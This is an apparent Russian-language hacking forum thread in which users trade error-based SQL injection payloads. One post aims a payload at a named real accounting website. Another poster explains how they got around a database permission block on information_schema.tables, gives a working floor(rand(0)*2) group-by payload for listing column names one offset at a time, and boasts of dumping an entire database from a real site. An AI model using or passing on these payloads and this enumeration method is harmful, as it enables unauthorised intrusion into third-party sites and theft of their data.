А чем вас Error вектор не устраивает? http://www.buhalteriams.lt/?id=42+O...,database())),1,63)+,+ FLOOR(RAND(0)*2)))+--+

Моими слабыми знаниями Буду дальше копать, благодарю. Не до конца понимал как составлять запросы такого типа.

Тут другyю страничку за титьку щупаю. При инжекции кидает что селект запрос для information_schema.tables под запретом для текущего юзверя. По убогому функционалу сайтика, контента под другими БД юзверями не предвидется. Error вектор, как я понял, не поможет? Только угадать таблицы, конечно если их дадут селектить?

Вот так обошел запрет на селект запросы для текущего пользователя БД и содрал названиея ячеек таблиц. Для знатоков баян конечно же, для меня открытие

id=22+and(select 1 from(select count(*),concat((SELECT column_name FROM information_schema.columns limit 176,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Перебираем чиска (к примеру теперь 176) и тяням по одному названию ячейки. Названия ячеек лежат в куче, но по первому ID можно определить, что началась новая таблица. Почемуто concat_ws, concat, group_concat не смог использовать, база цеплялась к ошибке "колумсов больше 1".

Когда узнал названия таблиц а после названия столбцов, база была в кармане. Вот тогда и сгрупировать ячейки смог и всю базу содрал